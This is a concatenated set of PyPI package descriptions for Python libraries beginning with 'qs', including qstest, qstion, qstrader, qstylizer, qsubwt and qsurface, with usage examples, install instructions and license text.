The following community-size functions are available:n - Number of nodes in a communityvol - Sum of the degrees of nodes in a communityTo pass your community-size function to qstest, see \"How to pass your community-size function to qstest\" below.cdalgorithm - Community-detection algorithm. The following algorithms are available:louvain - Louvain algorithm (http://perso.crans.org/aynaud/communities/index.html)label_propagation - Label propagation algorithm (https://networkx.github.io/documentation/stable/reference/algorithms/community.html)To pass your community-detection algorithm to qstest, see \"How to pass your community-detection algorithm to qstest\" below.num_of_rand_net (optional) - Number of randomised networks (Default: 500)alpha (optional) - Statistical significance level before the \u0160id\u00e1k correction (Default: 0.05)num_of_thread (optional) - Maximum number of CPU threads (Default: 4)Outputsg - Results of the significance test (C-dimensional list). sg[c] = True or False indicates that community c is significant or insignificant, respectively.p_values - P-values for the communities (C-dimensional list). p_values[c] is the p-value for community c.Example (examples/example1.py)import networkx as nximport qstest as qsnetwork = nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, qs.qmod, qs.vol, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your quality function to qstestWrite a quality function of a community as follows:q = my_qfunc(network, community)Inputnetwork - Networkx Graph class instancecommunity - List of nodes belonging to a communityOutputq - Quality of the communityThen, pass my_qfunc to qstest:sg, p_values = qstest(network, communities, my_qfunc, sfunc, cdalgorithm)Example (examples/example2.py)import networkx as nximport qstest as qs# Number of intra-community edgesdef my_qfunc(network, nodes):return network.subgraph(nodes).size()network = nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, my_qfunc, qs.vol, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your community-size function to qstestWrite a community-size function of a community as follows:s = my_sfunc(network, community)Inputnetwork - Networkx Graph class instancecommunity - List of the IDs of nodes belonging to a communityOutputs - Size of the communityThen, pass my_sfunc to qstest:sg, p_values = qstest(network, communities, qfunc, my_sfunc, cdalgorithm)Example (examples/example3.py)import networkx as nximport qstest as qs# Square of the number of nodes in a communitydef my_sfunc(network, nodes):return len(nodes) * len(nodes)network = 
nx.karate_club_graph()communities = qs.louvain(network)sg, p_values = qs.qstest(network, communities, qs.qmod, my_sfunc, qs.louvain)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014How to pass your community-detection algorithm to qstestTo pass your community-detection algorithm to qstest, write a wrapper function of the following form:communities = my_cdalgorithm(network)Inputnetwork - Networkx Graph class instanceOutputcommunities - C-dimensional list of lists. communities[c] is a list containing the IDs of nodes belonging to community c.Then, pass my_cdalgorithm to qstest:sg, p_values = qstest(network, communities, qfunc, sfunc, my_cdalgorithm)If the community-detection algorithm requires parameters such as the number of communities, then pass the parameters as global variables, e.g., define a global variable X, then use X within the cdalgorithm.Example (examples/example4.py)import networkx as nximport qstest as qsfrom networkx.algorithms import community as nxcdalgorithm# Wrapper function for async_fluidc implemented in Networkx 2.0def my_cdalgorithm(network):communities = []subnets = nx.connected_component_subgraphs(network)for subnet in subnets:coms_iter = nxcdalgorithm.asyn_fluidc(subnet, min([C, subnet.order()]), maxiter)for nodes in iter(coms_iter):communities.append(list(nodes))return communities# Pareameters of async_fluidcC = 3maxiter = 10network = nx.karate_club_graph()communities = my_cdalgorithm(network)sg, p_values = qs.qstest(network, communities, qs.qmod, qs.vol, my_cdalgorithm)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014RequirementsPython 2.7, 3.4 or laterSciPy 1.0 or laterNetworkx 2.0 or laterpython-louvain 0.9\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014Last updated: 29 November 2017"} +{"package": "qstion", "pacakge-description": "qstionA querystring parsing and stringifying library with some added security.\nLibrary was based onthisjs library.Usageimportqstionasqsx=qs.parse('a=c')assertx=={'a':'c'}x_str=qs.stringify(x)assertx_str=='a=c'Parsing stringsqstion(as well asqsin js) allows you to parse string into nested objects.importqstionasqsassertqs.parse('a[b][c]=1')=={'a':{'b':{'c':'1'}}}There is no support for plain object options or prototype pollution.Uri encoded strings are supportedimportqstionasqsassertqs.parse('a%5Bb%5D=c')=={'a':{'b':'c'}}Following options are 
supported:from_url:bool- ifTruethenparsewill parse querystring from url usingurlparsefromurllib.parsemodule, default:Falseimportqstionasqsassertqs.parse('http://localhost:8080/?a=c',from_url=True)=={'a':'c'}assertqs.parse('a=c',from_url=False)=={'a':'c'}delimiter:str|re.Pattern- delimiter for parsing, default:&importqstionasqsassertqs.parse('a=c&b=d',delimiter='&')=={'a':'c','b':'d'}assertqs.parse('a=c;b=d,c=d',delimiter='[;,]')=={'a':'c','b':'d','c':'d'}depth:int- maximum depth for parsing, default:5importqstionasqsassertqs.parse('a[b][c][d][e][f][g][h][i]=j',depth=5)=={'a':{'b':{'c':{'d':{'e':{'f':{'[g][h][i]':'j'}}}}}}}assertqs.parse('a[b][c][d][e][f][g][h][i]=j',depth=1)=={'a':{'b':{'[c][d][e][f][g][h][i]':'j'}}}parameter_limit:int- maximum number of parameters to parse, default:1000importqstionasqsassertqs.parse('a=b&c=d&e=f&g=h&i=j&k=l&m=n&o=p&q=r&s=t&u=v&w=x&y=z',parameter_limit=5)=={'a':'b','c':'d','e':'f','g':'h','i':'j'}allow_dots:bool- ifTruethen dots in keys will be parsed as nested objects, default:Falseimportqstionasqsassertqs.parse('a.b=c',allow_dots=True)=={'a':{'b':'c'}}parse_arrays:bool- ifTruethen arrays will be parsed, default:Falseimportqstionasqsassertqs.parse('a[]=b&a[]=c',parse_arrays=True)=={'a':{0:'b',1:'c'}}assertqs.parse('a[0]=b&a[1]=c',parse_arrays=False)=={'a':{'0':'b','1':'c'}}array_limit:int- maximum number of elements in array to keep array notation (only used with combination of argumentparse_arrays), default:20importqstionasqsassertqs.parse('a[]=b&a[]=c&',parse_arrays=True)=={'a':{0:'b',1:'c'}}assertqs.parse('a[0]=b&a[1]=c&',array_limit=1,parse_arrays=True)=={'a':{'0':'b','1':'c'}}allow_empty:bool- ifTruethen empty values and keys are accepted, default:Falseimportqstionasqsassertqs.parse('a=&b=',allow_empty=True)=={'a':'','b':''}assertqs.parse('a[]=&b[]=',allow_empty=True)=={'a':{'':''},'b':{'':''}}charset:str- charset to use when decoding uri encoded strings, default:utf-8importqstionasqsassertqs.parse('a=%A7',charset='iso-8859-1')=={'a':'\u00a7'}assertqs.parse('a=%C2%A7',charset='utf-8')=={'a':'\u00a7'}charset_sentinel:bool- ifTruethen, ifutf8=\u2713arg is included in querystring, then charset will be deduced based on encoding of '\u2713' character (recognizes onlyutf8andiso-8859-1), default:Falseimportqstionasqsassertqs.parse('a=%C2%A7&utf8=%E2%9C%93',charset='iso-8859-1',charset_sentinel=True)=={'a':'\u00a7'}assertqs.parse('a=%A7&utf8=%26%2310003',charset='utf-8',charset_sentinel=True)=={'a':'\u00a7'}interpret_numeric_entities:bool- ifTruethen numeric entities will be interpreted as unicode characters, default:Falseimportqstionasqsassertqs.parse('a=%26%2310003',charset='iso-8859-1',interpret_numeric_entities=True)=={'a':'\u2713'}parse_primitive:bool- ifTruethen primitive values will be parsed in their appearing types, default:Falseimportqstionasqsassertqs.parse('a=1&b=2&c=3',parse_primitive=True)=={'a':1,'b':2,'c':3}assertqs.parse('a=true&b=false&c=null',parse_primitive=True)=={'a':True,'b':False,'c':None}primitive_strict:bool- ifTruethen primitive values ofboolandNoneTypewill be parsed to reserved strict keywords (used only ifparse_primitiveisTrue), default:Trueimportqstionasqsassertqs.parse('a=true&b=false&c=null&d=None',parse_primitive=True,primitive_strict=True)=={'a':True,'b':False,'c':None,'d':'None'}assertqs.parse('a=True&b=False&c=NULL',parse_primitive=True,primitive_strict=True)=={'a':'True','b':'False','c':'NULL'}assertqs.parse('a=True&b=False&c=NULL',parse_primitive=True,primitive_strict=False)=={'a':True,'b':False,'c':None}comma:bool- 
ifTrue, then coma separated values will be parsed as multiple separate values instead of string, default:Falseimportqstionasqsassertqs.parse('a=1,2,3',comma=True,parse_primitive=True)=={'a':[1,2,3]}Stringifying objectsqstion(as well asqsin js) allows you to stringify objects into querystring.importqstionasqsassertqs.stringify({'a':'b'})=='a=b'Following options are supported:allow_dots:bool- ifTruethen nested keys will be stringified using dot notation instead of brackets, default:Falseimportqstionasqsassertqs.stringify({'a':{'b':'c'}},allow_dots=True)=='a.b=c'encode:bool- ifTruethen keys and values will be uri encoded (with defaultcharset), default:Trueimportqstionasqsassertqs.stringify({'a[b]':'b'},encode=False)=='a[b]=b'assertqs.stringify({'a[b]':'b'},encode=True)=='a%5Bb%5D=b'charset:str- charset to use when encoding uri strings, default:utf-8(ifencodeisTrue), note that un-encodable characters will be encoded using their xml numeric entitiesimportqstionasqsassertqs.stringify({'a':'\u00a7'},charset='iso-8859-1')=='a=%A7'assertqs.stringify({'a':'\u263a'},charset='iso-8859-1')=='a=%26%2312850'charset_sentinel:bool- ifTruethen,utf8=\u2713will be added to querystring to indicate that charset based on encoding of '\u2713' character (recognizes onlyutf8andiso-8859-1), default:Falseimportqstionasqsassertqs.stringify({'a':'\u00a7'},charset='iso-8859-1',charset_sentinel=True)=='a=%A7&utf8=%E2%9C%93'delimiter:str- delimiter for stringifying, default:&importqstionasqsassertqs.stringify({'a':'b','c':'d'},delimiter='&')=='a=b&c=d'assertqs.stringify({'a':'b','c':'d'},delimiter=';')=='a=b;c=d'encode_values_only:bool- ifTruethen only values will be encoded, default:False(this option is overridden whenencodeisTrue)importqstionasqsassertqs.stringify({'a':{'b':'\u263a'}},encode_values_only=True,charset='iso-8859-1')=='a[b]=%26%2312850'array_format:str- format for array notation, options: 'brackets','indices', 'repeat', 'comma', default: 'indices'importqstionasqsassertqs.stringify({'a':{1:'b',2:'c'}},array_format='brackets')=='a[]=b&a[]=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='indices')=='a[1]=b&a[2]=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='repeat')=='a=b&a=c'assertqs.stringify({'a':{1:'b',2:'c'}},array_format='comma')=='a=b,c'sort:bool- ifTruethen keys will be sorted alphabetically, default:Falseimportqstionasqsassertqs.stringify({'x':'y','a':'b'},sort=True)=='a=b&x=y'sort_reverse:bool- ifTruethen keys will be sorted (ifsortisTrue) in reverse order, default:Falseimportqstionasqsassertqs.stringify({'x':'y','a':'b'},sort=True,sort_reverse=True)=='x=y&a=b'filter:list[str]- list of keys to filter, default:Noneimportqstionasqsassertqs.stringify({'a':'b','c':'d'},filter=['a'])=='a=b'"} +{"package": "qstock", "pacakge-description": 
"qstock\u7531\u201cPython\u91d1\u878d\u91cf\u5316\u201d\u516c\u4f17\u53f7\u5f00\u53d1\uff0c\u8bd5\u56fe\u6253\u9020\u6210\u4e2a\u4eba\u91cf\u5316\u6295\u7814\u5206\u6790\u5f00\u6e90\u5e93\uff0c\u76ee\u524d\u5305\u62ec\u6570\u636e\u83b7\u53d6\uff08data\uff09\u3001\u53ef\u89c6\u5316(plot)\u3001\u9009\u80a1(stock)\u548c\u91cf\u5316\u56de\u6d4b\uff08backtest\uff09\u56db\u4e2a\u6a21\u5757\u3002\u5176\u4e2d\u6570\u636e\u6a21\u5757\uff08data\uff09\u6570\u636e\u6765\u6e90\u4e8e\u4e1c\u65b9\u8d22\u5bcc\u7f51\u3001\u540c\u82b1\u987a\u3001\u65b0\u6d6a\u8d22\u7ecf\u7b49\u7f51\u4e0a\u516c\u5f00\u6570\u636e\uff0c\u6570\u636e\u722c\u866b\u90e8\u5206\u53c2\u8003\u4e86\u73b0\u6709\u91d1\u878d\u6570\u636e\u5305tushare\u3001akshare\u548cefinance\u3002qstock\u81f4\u529b\u4e8e\u4e3a\u7528\u6237\u63d0\u4f9b\u66f4\u52a0\u7b80\u6d01\u548c\u89c4\u6574\u5316\u7684\u91d1\u878d\u5e02\u573a\u6570\u636e\u63a5\u53e3\u3002\u53ef\u89c6\u5316\u6a21\u5757\u57fa\u4e8eplotly.express\u548cpyecharts\u5305\uff0c\u4e3a\u7528\u6237\u63d0\u4f9b\u57fa\u4e8eweb\u7684\u4ea4\u4e92\u56fe\u5f62\u7b80\u5355\u64cd\u4f5c\u63a5\u53e3\uff1b\u9009\u80a1\u6a21\u5757\u63d0\u4f9b\u4e86\u540c\u82b1\u987a\u7684\u6280\u672f\u9009\u80a1\u548c\u516c\u4f17\u53f7\u7b56\u7565\u9009\u80a1\uff0c\u5305\u62ecRPS\u3001MM\u8d8b\u52bf\u3001\u8d22\u52a1\u6307\u6807\u3001\u8d44\u91d1\u6d41\u6a21\u578b\u7b49\uff0c\u56de\u6d4b\u6a21\u5757\u4e3a\u5927\u5bb6\u63d0\u4f9b\u5411\u91cf\u5316\uff08\u57fa\u4e8epandas\uff09\u548c\u57fa\u4e8e\u4e8b\u4ef6\u9a71\u52a8\u7684\u57fa\u672c\u6846\u67b6\u548c\u6a21\u578b\u3002\nqstock\u76ee\u524d\u5728pypi\u5b98\u7f51\u4e0a\u53d1\u5e03\uff0c\u5f00\u6e90\u7b2c\u4e00\u7248\u672c\u4e3a1.1.0\uff0c\u76ee\u524d\u66f4\u65b0\u81f31.3.4.\u8bfb\u8005\u76f4\u63a5\u201cpip install qstock \u201d\u5b89\u88c5\uff0c\u6216\u901a\u8fc7\u2019pip install \u2013upgrade qstock\u2019\u8fdb\u884c\u66f4\u65b0\u3002GitHub\u5730\u5740\uff1ahttps://github.com/tkfy920/qstock\u3002\u76ee\u524d\u90e8\u5206\u7b56\u7565\u9009\u80a1\u548c\u7b56\u7565\u56de\u6d4b\u529f\u80fd\u4ec5\u4f9b\u77e5\u8bc6\u661f\u7403\u4f1a\u5458\u4f7f\u7528\uff0c\u4f1a\u5458\u53ef\u5728\u77e5\u8bc6\u661f\u7403\u7f6e\u9876\u5e16\u5b50\u4e0a\u4e0a\u83b7\u53d6qstock\u79bb\u7ebf\u5b89\u88c5\u5305\u3002\u76f8\u5173\u6559\u7a0b\uff1a\u3010qstock\u5f00\u6e90\u4e86\u3011\u6570\u636e\u7bc7\u4e4b\u884c\u60c5\u4ea4\u6613\u6570\u636e(https://mp.weixin.qq.com/s/p1lEsBVhrm5ej3YZl0BhOw)\n\u3010qstock\u6570\u636e\u7bc7\u3011\u884c\u4e1a\u6982\u5ff5\u677f\u5757\u4e0e\u8d44\u91d1\u6d41(https://mp.weixin.qq.com/s/hj4yuqFDBidAeSRucz6TwQ)\n\u3010qstock\u91cf\u5316\u3011\u6570\u636e\u7bc7\u4e4b\u80a1\u7968\u57fa\u672c\u9762\u6570\u636e(https://mp.weixin.qq.com/s/XznS8hFMEa47x1IElZXJaA)\n\u3010qstock\u91cf\u5316\u3011\u6570\u636e\u7bc7\u4e4b\u5b8f\u89c2\u6307\u6807\u548c\u8d22\u7ecf\u65b0\u95fb\u6587\u672c(https://mp.weixin.qq.com/s/vq7BJUCdHMkcgJYjsErpYQ)\n\u3010qstock\u91cf\u5316\u3011\u52a8\u6001\u4ea4\u4e92\u6570\u636e\u53ef\u89c6\u5316(https://mp.weixin.qq.com/s/zmY4gsPDQ6xDDpC-fVBUPg)\u66f4\u591a\u5e72\u8d27\u8bf7\u5173\u6ce8\u5fae\u4fe1\u516c\u4f17\u53f7\uff1aPython\u91d1\u878d\u91cf\u5316"} +{"package": "qstr", "pacakge-description": "qstr: convert Python objects to a KDB+q stringUsage Example:import datetime as dt\nfrom qstr import qstr\nqstr(\"Hello\", 3., [3., dt.date(2000, 1, 1)], [], {\"A\": 3, \"B\": 4})"} +{"package": "qstrader", "pacakge-description": "QSTraderDevelopmentDetailsTest StatusVersion InfoCompatibilityLicenseQSTrader is a free Python-based open-source modular schedule-driven 
backtesting framework for long-short equities and ETF based systematic trading strategies.QSTrader can be best described as a loosely-coupled collection of modules for carrying out end-to-end backtests with realistic trading mechanics.The default modules provide useful functionality for certain types of systematic trading strategies and can be utilised without modification. However the intent of QSTrader is for the users to extend, inherit or fully replace each module in order to provide custom functionality for their own use case.The software is currently under active development and is provided under a permissive \"MIT\" license.Previous Version and Advanced Algorithmic TradingPlease note that the previous version of QSTrader, which is utilised through theAdvanced Algorithmic Tradingebook, can be found along with the appropriate installation instructionshere.It has recently been updated to support Python 3.9, 3.10, 3.11 and 3.12 with up to date package dependencies.InstallationInstallation requires a Python3 environment. The simplest approach is to download a self-contained scientific Python distribution such as theAnaconda Individual Edition. You can then install QSTrader into an isolatedvirtual environmentusing pip as shown below.Any issues with installation should be reported to the development team as issueshere.condacondais a command-line tool that comes with the Anaconda distribution. It allows you to manage virtual environments as well as packagesusing the same tool.The following command will create a brand new environment calledbacktest.conda create -n backtest pythonThis will use the conda default Python version. At time of writing this was Python 3.12. QSTrader currently supports Python 3.9, 3.10, 3.11 and 3.12. Optionally you can specify a python version by substituting python==3.9 into the command as follows:conda create -n backtest python==3.9In order to start using QSTrader, you need to activate this new environment and install QSTrader using pip.conda activate backtest\npip3 install qstraderpipAlternatively, you can usevenvto handle the environment creation andpipto handle the package installation.python -m venv backtest\nsource backtest/bin/activate # Need to activate environment before installing package\npip3 install qstraderFull DocumentationComprehensive documentation and beginner tutorials for QSTrader can be found on QuantStart.com athttps://www.quantstart.com/qstrader/.QuickstartThe QSTrader repository provides some simple example strategies at/examples.Within this quickstart section a classic 60/40 equities/bonds portfolio will be backtested with monthly rebalancing on the last day of the calendar month.To get started download thesixty_forty.pyfile and place into the directory of your choice.The 60/40 script makes use of OHLC 'daily bar' data from Yahoo Finance. In particular it requires theSPYandAGGETFs data. Download the full history for each and save as CSV files in same directory assixty_forty.py.Assuming that an appropriate Python environment exists and QSTrader has been installed (seeInstallationabove), make sure to activate the virtual environment, navigate to the directory withsixty_forty.pyand type:python sixty_forty.pyYou will then see some console output as the backtest simulation engine runs through each day and carries out the rebalancing logic once per month. 
Once the backtest is complete a tearsheet will appear:You can examine the commentedsixty_forty.pyfile to see the current QSTrader backtesting API.If you have any questions about the installation or example usage then please feel free to emailsupport@quantstart.comor raise an issuehere.Current FeaturesBacktesting Engine- QSTrader employs a schedule-based portfolio construction approach to systematic trading. Signal generation is decoupled from portfolio construction, risk management, execution and simulated brokerage accounting in a modular, object-oriented fashion.Performance Statistics- QSTrader provides typical 'tearsheet' performance assessment of strategies. It also supports statistics export via JSON to allow external software to consume metrics from backtests.Free Open-Source Software- QSTrader has been released under a permissive open-source MIT License. This allows full usage in both research and commercial applications, without restriction, but with no warranty of any kind whatsoever (seeLicensebelow). QSTrader is completely free and costs nothing to download or use.Software Development- QSTrader is written in the Python programming language for straightforward cross-platform support. QSTrader contains a suite of unit and integration tests for the majority of its modules. Tests are continually added for new features.License TermsCopyright (c) 2015-2024 QuantStart.com, QuarkGluon LtdPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Trading DisclaimerTrading equities on margin carries a high level of risk, and may not be suitable for all investors. Past performance is not indicative of future results. The high degree of leverage can work against you as well as for you. Before deciding to invest in equities you should carefully consider your investment objectives, level of experience, and risk appetite. The possibility exists that you could sustain a loss of some or all of your initial investment and therefore you should not invest money that you cannot afford to lose. 
You should be aware of all the risks associated with equities trading, and seek advice from an independent financial advisor if you have any doubts."} +{"package": "qstrbuilder", "pacakge-description": "qstrbuilder: convert Python objects to a KDB+q stringUsage Example:import datetime as dt\nfrom qstrbuilder import build\nbuild(\"Hello\", 3., [3., dt.date(2000, 1, 1)], [], {\"A\": 3, \"B\": 4})"} +{"package": "qstress", "pacakge-description": "qstressA simple tool for stress testing."} +{"package": "qstring", "pacakge-description": "qstring is a Python library that allows you to create nested objects from a list\nof querystring parameters.ResourcesDocumentationBug TrackerCodeDevelopment Version"} +{"package": "qstylizer", "pacakge-description": "InstallationpipinstallqstylizerDocumentationRead the Docs.Introductionqstylizeris a python package designed to help with the construction of\nPyQt/PySide stylesheets.importPyQt5.QtWidgetsimportqstylizer.stylecss=qstylizer.style.StyleSheet()css.setValues(backgroundColor=\"green\",color=\"#F0F0F0\",marginLeft=\"2px\")css.QToolButton.setValues(border=\"1px transparent lightblue\",borderRadius=\"3px\",margin=\"1px\",padding=\"3px\")css.QToolButton.menuButton.pressed.setValues(border=\"1px solid #333333\",padding=\"5px\",backgroundColor=\"#333333\")# The following is also valid and is equivalent to the statement above.css[\"QToolButton::menu-button:pressed\"].setValues(**{\"border\":\"1px solid #333333\",\"padding\":\"5px\",\"background-color\":\"#333333\",})css.QCheckBox.disabled.backgroundColor.setValue(\"#797979\")widget=PyQt5.QtWidgets.QWidget()widget.setStyleSheet(css.toString())The stylesheet generated above looks like this when passed to setStyleSheet():* {\n color: #F0F0F0;\n margin-left: 2px;\n background-color: green;\n}\nQToolButton {\n border-radius: 3px;\n padding: 3px;\n border: 1px transparent lightblue;\n margin: 1px;\n}\nQToolButton::menu-button:pressed {\n padding: 5px;\n border: 1px solid #333333;\n background-color: #333333;\n}\nQCheckBox:disabled {\n background-color: #797979;\n}The true power comes from parsing an existing stylesheet and tweaking individual\nproperty values.importqstylizer.parsercss=qstylizer.parser.parse(\"\"\"\n QToolButton::menu-button:pressed {\n padding: 5px;\n border: 1px solid #333333;\n background-color: #333333;\n }\n QCheckBox:disabled {\n background-color: #797979;\n }\n \"\"\")css.QToolButton.menuButton.pressed.padding.setValue(\"10px\")css.QCheckBox.disabled.backgroundColor.setValue(\"#222222\")print(css.toString())Output:QToolButton::menu-button:pressed {\n padding: 10px;\n border: 1px solid #333333;\n background-color: #333333;\n}\nQCheckBox:disabled {\n background-color: #222222;\n}LicenseMIT LicenseCopyright (c) 2018 Brett LambrightPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND 
NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qsubr", "pacakge-description": "qsubr==========version 0.2A quick qsub job submission programqsubrusage:Themissingqsubcommand[-h][--clusterCLUSTER][--queueQUEUE][--accountACCOUNT][--nameNAME][--memMEM][--nodesNODES][--threadsTHREADS][--logLOG][--debug]commandpositionalarguments:commandAquotedstringofcommands\n\noptionalarguments:-h,--helpshowthishelpmessageandexit--clusterCLUSTER,-cCLUSTERclustersettings--queueQUEUE,-qQUEUEqueue--accountACCOUNT,-AACCOUNTaccount_string--nameNAME,-NNAMEname--memMEM,-gbMEMmemoryingigabytes--nodesNODES,-nNODESnodes--threadsTHREADS,-tTHREADSthreads--logLOG,-lLOGlogfilename--debug,-dToprintcommands(Fortestingflow).OPTIONALAcknowledgementsWritten by Scott Furlan."} +{"package": "qsubwt", "pacakge-description": "Simple wrapper for sge qsub which provides the functionality of the \"-sync\" optionpython requires: >=3.5Installgit repo (for recommend)pip install git+https://github.com/yodeng/qsubwt.gitPypipip install qsubwt -UHelp$ qsubwt -h \nSimple wrapper for sge qsub which provides the functionality of the \"-sync\" option.\n\nUsage:\n qsubwt [qsub options] script.sh\n\nVersion: xxx\nAuthor: Deng Yong\nAuthor-email: yodeng@tju.edu.cn\nHome-page: https://github.com/yodeng/qsubwt.git"} +{"package": "qsuite", "pacakge-description": "No description available on PyPI."} +{"package": "qsum", "pacakge-description": "Intuitive and extendable checksumming for python objects"} +{"package": "qsurface", "pacakge-description": "QsurfaceQsurface is a simulation package for the surface code, and is designed to modularize 3 aspects of a surface code simulation.The surface codeThe error modelThe used decoderNew types of surface codes, error modules and decoders can be added to Qsurface by using the included templates for each of the three core module categories.The current included decoders are:TheMininum-Weight Perfect Matching(mwpm) decoder.Delfosse's and Nickerson'sUnion-Find(unionfind) decoder, which hasalmost-linearworst-case time complexity.Our modification to the Union-Find decoder; theUnion-Find Node-Suspension(ufns) decoder, which improves the threshold of the Union-Find decoder to near MWPM performance, while retaining quasi-linear worst-case time complexity.The compatibility of these decoders with the included surface codes are listed below.Decoderstoriccodeplanarcodemwpm\u2705\u2705unionfind\u2705\u2705ufns\u2705\u2705InstallationAll required packages can be installed through:pipinstallqsurfaceRequirementsPython 3.7+TkinterorPyQt5for interactive plotting.Matplotlib 3.4+ for plotting on a 3D lattice (Refers to a future release of matplotlib, seepull request)MWPM decoderThe MWPM decoder utilizesnetworkxfor finding the minimal weights in a fully connected graph. This implementation is however rather slow compared to Kolmogorov'sBlossom Valgorithm. Blossom V has its own license and is thus not included with Qsurface. 
We do provided a single function to download and compile Blossom V, and to setup the integration with Qsurface automatically.>>>fromqsurface.decodersimportmwpm>>>mwpm.get_blossomv()UsageTo simulate the toric code and simulate with bitflip error for 10 iterations and decode with the MWPM decoder:>>>fromqsurface.mainimportinitialize,run>>>code,decoder=initialize((6,6),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"])>>>run(code,decoder,iterations=10,error_rates={\"p_bitflip\":0.1}){'no_error':8}Benchmarking of decoders can be enabled by attaching abenchmarkerobject to the decoder. See the docs for the syntax and information to setup benchmarking.>>>fromqsurface.mainimportinitialize,run>>>benchmarker=BenchmarkDecoder({\"decode\":\"duration\"})>>>run(code,decoder,iterations=10,error_rates={\"p_bitflip\":0.1},benchmark=benchmarker){'no_error':8,'benchmark':{'success_rate':[10,10],'seed':12447.413636559,'durations':{'decode':{'mean':0.00244155000000319,'std':0.002170364089572033}}}}PlottingThe figures in Qsurface allows for step-by-step visualization of the surface code simulation (and if supported the decoding process). Each figure logs its history such that the user can move backwards in time to view past states of the surface (and decoder). Presshwhen the figure is open for more 